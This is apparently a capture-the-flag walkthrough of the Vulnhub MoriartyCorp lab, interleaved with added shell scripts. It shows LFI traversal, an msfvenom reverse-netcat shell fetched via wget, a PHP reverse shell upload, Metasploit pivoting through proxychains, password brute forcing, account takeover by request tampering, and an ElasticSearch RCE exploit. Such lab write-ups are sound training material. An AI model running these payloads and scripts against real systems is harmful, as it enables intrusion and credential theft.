Vulnhub – MoriartyCorp Walkthrough

Scanning the host with nmap -A -T4 -p- 192.168.1.12 -vv

At first I visited the site on port 8000 and got some instructions and a box to enter flag{start}; the next page said to visit the site on port 80, which wasn't available in the first scan. If you run nmap again, port 80 is now open.

This is the site on port 8000

And this is the site on port 80

Now for some LFI: I got /etc/passwd back by entering ?file=../../../etc/passwd
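A quick way to confirm the traversal and find the depth that works before reaching for a tool, as an added example that is not part of the original walkthrough. It assumes the page's target URL and parameter (http://192.168.1.12/?file=); the depth range and the "does this look like passwd" check are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the walkthrough): probe a ?file= parameter for LFI.
# Assumes the target base URL from the walkthrough; depths and detection
# logic are this example's own choices.

# Build a traversal payload: <depth> copies of "../" followed by the path
# without its leading slash, e.g. lfi_payload 3 /etc/passwd -> ../../../etc/passwd
lfi_payload() {
  depth=$1
  path=$2
  prefix=""
  i=0
  while [ "$i" -lt "$depth" ]; do
    prefix="${prefix}../"
    i=$((i + 1))
  done
  printf '%s%s' "$prefix" "${path#/}"
}

# Succeed if stdin looks like /etc/passwd: a root entry with uid 0 and gid 0.
# Matching the structure rather than the word "root" avoids false positives
# from error pages that merely echo the requested file name back.
looks_like_passwd() {
  grep -Eq '^root:[^:]*:0:0:'
}

# Try depths 1..8 against "<base>../.../etc/passwd" and report the first hit.
# usage: lfi_probe 'http://192.168.1.12/?file='
lfi_probe() {
  base=$1
  depth=1
  while [ "$depth" -le 8 ]; do
    payload=$(lfi_payload "$depth" /etc/passwd)
    if curl -s --max-time 5 "${base}${payload}" | looks_like_passwd; then
      printf 'LFI confirmed: %s%s\n' "$base" "$payload"
      return 0
    fi
    depth=$((depth + 1))
  done
  printf 'no LFI with plain traversal up to depth 8\n' >&2
  return 1
}
```

The walkthrough's payload used three levels; the loop simply finds that number for you, and the structural check on the passwd line means a 404 page that echoes the file name does not count as a hit.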

For the next step I recommend LFISuite. Since the host is vulnerable to LFI we can turn it into a shell: download the tool, start it with python lfisuite.py, choose #1 Exploiter, then #9 Auto-Hack, enter the web address http://192.168.1.12/?file=page1.html and you will get a shell:

According to the tool's page, to get a reverse shell all we have to do is type reverseshell and enter our IP and listening port, but that does not work here because neither python nor php is installed on the host.

What I did was generate a script with msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.13 LPORT=4444 > shell.sh, transfer it to the host with wget, and catch the connection with a Metasploit handler, which gave me a shell back.

To escape the restricted shell, type /bin/sh -i, then navigate to / and you can see the first flag, 1_flag.txt:

We enter flag{the_game_is_on} back into the page at 192.168.1.12:8000

And we get the next step to proceed from here.

arp -a gave us one IP address (172.17.0.1) at 02:42:e0:05:31:77 [ether] on eth0. Both details point at Docker: 172.17.0.0/16 is the default docker0 bridge network and 02:42 is the MAC prefix Docker assigns, so the rest of the lab is most likely running in containers behind this host.

After a lot of googling I found a guide to pivoting with Metasploit; following its steps gets us access to the internal network behind the host (I had to get back into the meterpreter session again to do these steps):

First we edit /etc/proxychains.conf and add a socks5 entry pointing at 127.0.0.1 (the listener will run on our own machine) on port 1080:

Then in Metasploit we put the session in the background by typing 'background', so we can add the route and start the socks5 proxy:

run autoroute -s 172.17.0.0/24

run autoroute -p

use auxiliary/server/socks5

run

Now in a new tab run proxychains nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p80 and you will get something like this (-sT and -Pn are not optional here: proxychains only relays TCP connections, so a SYN scan or an ICMP ping would bypass the proxy entirely):
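The whole pivot above, written out as files you can regenerate instead of retyping, as an added example that is not part of the original walkthrough. The subnet, proxy port and module names are the page's; the session number, file paths and target port are hypothetical, and the resource script uses post/multi/manage/autoroute, which is what "run autoroute" calls under the hood.

```shell
#!/bin/sh
# Added example (not from the walkthrough): generate the two files the pivot
# needs, then scan through the tunnel. Session number, paths and the nmap
# target port are hypothetical; the subnet and proxy port are the page's.

# proxychains.conf: a single SOCKS5 hop to the Metasploit listener on this
# machine. proxy_dns keeps name lookups from leaking outside the tunnel.
write_proxychains_conf() {
  cat > "$1" <<'EOF'
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 1080
EOF
}

# Metasploit resource script: add a route to 172.17.0.0/24 through the given
# meterpreter session, then start the SOCKS5 server as a background job.
# (Newer Metasploit ships auxiliary/server/socks_proxy with "set VERSION 5"
# in place of auxiliary/server/socks5.)
write_msf_rc() {
  rc=$1
  session=$2
  cat > "$rc" <<EOF
use post/multi/manage/autoroute
set SESSION $session
set SUBNET 172.17.0.0
set NETMASK 255.255.255.0
run
route print
use auxiliary/server/socks5
set SRVHOST 127.0.0.1
set SRVPORT 1080
run -j
EOF
}

# Scan through the tunnel. -sT and -Pn are mandatory: proxychains only
# intercepts TCP connect(), so SYN scans and ICMP pings never enter the proxy.
# -n skips reverse DNS, which is painfully slow through a SOCKS hop.
# (-f selects a config file; this is a proxychains-ng option.)
pivot_scan() {
  proxychains -f "$1" nmap -sT -Pn -n -sV -T4 -p "$2" 172.17.0.0/24
}

# usage:
#   write_proxychains_conf ./proxychains.conf
#   write_msf_rc ./pivot.rc 1 && msfconsole -q -r ./pivot.rc
#   pivot_scan ./proxychains.conf 80
```

Run the resource script once the meterpreter session is backgrounded; "route print" in it shows whether the 172.17.0.0/24 entry actually landed before you start scanning.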

Then I used the Firefox extension Proxy SwitchyOmega and added a SOCKS5 proxy at 127.0.0.1:1080

Now that we have access to the internal network, go to 172.17.0.3 (the first two IPs are not the right ones):

We get an upload page that requires a password. Let's fire up Burp Suite and brute force the password; first turn off the browser proxy so Burp has a chance to catch the traffic, then we can turn it back on later:
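The same length-based brute force done with curl through the SOCKS tunnel instead of Burp Intruder, as an added example that is not part of the original walkthrough. The form field name "password" and the URL path are hypothetical; take the real ones from the request Burp captured.

```shell
#!/bin/sh
# Added example (not from the walkthrough): the length-based brute force
# done with curl through the SOCKS tunnel instead of Burp Intruder.
# The form field name "password" and the path are hypothetical; take the real
# ones from the request captured in Burp.

# Submit one candidate and print "<response length> <password>".
# (proxychains writes its own chatter to stderr; only curl's stdout is counted.)
try_password() {
  url=$1
  pw=$2
  len=$(proxychains curl -s --max-time 10 --data-urlencode "password=$pw" "$url" | wc -c | tr -d ' ')
  printf '%s %s\n' "$len" "$pw"
}

# Read "<length> <password>" lines and print every password whose response
# length differs from the most common one: a wrong password returns the same
# page every time, so the odd length out is the hit (or at least worth a look).
length_outlier() {
  awk '
    { len[NR] = $1; pw[NR] = $2; count[$1]++ }
    END {
      best = 0
      for (l in count) if (count[l] > best) { best = count[l]; mode = l }
      for (i = 1; i <= NR; i++) if (len[i] != mode) print pw[i]
    }'
}

# usage: brute_force 'http://172.17.0.3/' MORIAS password guest admin toor root
brute_force() {
  url=$1
  shift
  for pw in "$@"; do
    try_password "$url" "$pw"
  done | length_outlier
}
```

This is exactly what sorting Intruder's Length column does; splitting the collection from the analysis means you can also feed it a saved Intruder export. With only two candidates of different length the "mode" is whichever awk sees first, so give it a handful of known-bad passwords as a baseline.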

The one password whose response length differs is 'password'. BUT WAIT, before we do anything else let's upload a shell to the server; a PHP reverse shell will do just fine:

With our listener ready (nc -lvp 333) we get a shell back to our machine, and this time we find flag number 2:

Now we enter the flag in the flag box and see what we get:

We get some usernames and password hashes to crack; we'll crack them online as they are very easy:

MORIAS – password – guest – admin – toor – root – mcorp – moriarty – MCORP – weapons

The right one is weapons, and the username is root
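Pasting hashes into an online cracker works for a lab, but the candidate list is short enough to check offline in a few lines, as an added example that is not part of the original walkthrough. The words are the ones listed above; the algorithm is guessed from the digest length (the page does not say which hash type it was), and anything with a "$" prefix (crypt-style, salted) is out of scope for this and belongs in john or hashcat.

```shell
#!/bin/sh
# Added example (not from the walkthrough): check the page's candidate list
# against an unsalted hex digest offline instead of using an online cracker.
# The hash algorithm is guessed from the digest length.

# Candidate words as listed on the page.
MORIARTY_CANDIDATES='MORIAS
password
guest
admin
toor
root
mcorp
moriarty
MCORP
weapons'

# Map a hex digest length to the coreutils tool that produces it.
hash_tool_for() {
  case ${#1} in
    32) echo md5sum ;;
    40) echo sha1sum ;;
    64) echo sha256sum ;;
    *)  return 1 ;;
  esac
}

# crack_hash <hex digest>   (candidates on stdin, one per line)
# Prints "<algo>:<word>" for the first candidate whose digest matches.
crack_hash() {
  target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  tool=$(hash_tool_for "$target") || { echo "unrecognised digest length ${#target}" >&2; return 2; }
  while IFS= read -r word || [ -n "$word" ]; do
    [ -n "$word" ] || continue
    # printf without a newline: hashing "word\n" is the classic way to miss a hit
    h=$(printf '%s' "$word" | "$tool" | cut -d' ' -f1)
    if [ "$h" = "$target" ]; then
      printf '%s:%s\n' "${tool%sum}" "$word"
      return 0
    fi
  done
  return 1
}

# usage: printf '%s\n' "$MORIARTY_CANDIDATES" | crack_hash <hash from the flag page>
```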

At this point I couldn't ssh in from Linux using the terminal, PuTTY, snowflake-ssh or any other client; I ended up using MobaXterm on a Windows machine, which I usually use with a Raspberry Pi, and it worked:

The next flag is flag{what_weapons}

Now we scan the host again, and this time we get ports 443, 8000, 8080 and 8888, plus a username, buyer13, with the password arms13:

The secret webpage is hosted on 172.17.0.5:8000

Firing up Burp Suite again: we have a chat page and a change-password page. The chat is between two parties, the buyer and the admin, while the change-password form is for the buyer, and we can tamper with it:

We can change the username to admin and leave the password as it is, then send this request to Repeater. The server trusts the client-supplied username instead of the logged-in session, so the buyer can reset any account's password:

Now we are in as admin and can see a new chat page:

The new flag is flag{on_the_move}; let's see what's next:

OMG, this lab is getting ridiculous; it has been two days now with a lot of bugs, and I don't know where they come from or what is causing them. Anyway, it says this is the last piece of evidence, something about ElasticSearch, so I searched for it with searchsploit and got some results:

The ElasticSearch exploit needs the service on port 9200 (you can find the port in Metasploit), so I scanned again with proxychains nmap -sV -sT -Pn -p9200 172.17.0.0/24 and got a hit on 172.17.0.6:
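Before trying exploits one by one it is worth pulling the banner on 9200, which reports the exact version, as an added example that is not part of the original walkthrough. The walkthrough does not name the CVE; the 1.4.3 threshold below assumes that 36337.py is the Groovy scripting RCE (CVE-2015-1427), which was fixed in ElasticSearch 1.4.3. The banner in the block is constructed in the shape ES 1.x returns, not captured from the box.

```shell
#!/bin/sh
# Added example (not from the walkthrough): confirm what is listening on
# 172.17.0.6:9200 before throwing exploits at it. The walkthrough does not name
# the CVE; the 1.4.3 threshold ASSUMES 36337.py is the Groovy scripting RCE
# (CVE-2015-1427), fixed in 1.4.3.

# Constructed banner in the shape ES 1.x returns on "/" (not captured from the box).
SAMPLE_BANNER='{"status":200,"name":"Moriarty","cluster_name":"elasticsearch","version":{"number":"1.4.2","build_hash":"0000000","build_timestamp":"2014-12-16T14:11:12Z","build_snapshot":false,"lucene_version":"4.10.2"},"tagline":"You Know, for Search"}'

# Extract version.number from a banner on stdin (no jq needed on the attack box).
es_version_from_banner() {
  sed -n 's/.*"number"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1
}

# version_lt A B: success if dotted version A sorts before B (1.4.2 < 1.4.3,
# 1.10.0 > 1.4.3), comparing each component numerically, not as a string.
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".")
    k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      xi = (i <= n) ? x[i] + 0 : 0
      yi = (i <= m) ? y[i] + 0 : 0
      if (xi < yi) exit 0
      if (xi > yi) exit 1
    }
    exit 1
  }'
}

# es_check <banner json>: 0 = version predates the fix, 1 = patched, 2 = unknown
es_check() {
  v=$(printf '%s' "$1" | es_version_from_banner)
  [ -n "$v" ] || { echo "no version.number in banner" >&2; return 2; }
  if version_lt "$v" 1.4.3; then
    echo "ElasticSearch $v: older than 1.4.3, worth trying 36337.py"
    return 0
  fi
  echo "ElasticSearch $v: 1.4.3 or later, look elsewhere"
  return 1
}

# Live version, through the pivot:
#   es_check "$(proxychains curl -s --max-time 5 http://172.17.0.6:9200/)"
```

The numeric comparison matters: a plain string sort would put 1.10.x before 1.4.3 and mark a patched server as vulnerable.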

Let's try the exploits one by one and see which one works:

It was the first exploit, and it worked: proxychains python 36337.py 172.17.0.6:

The last flag is flag{game_over}; let's use it for the last time:

WHAT!!! I got blacklisted, lol. Oh well, it's finally done; it was an amazing box and took me two days to solve.
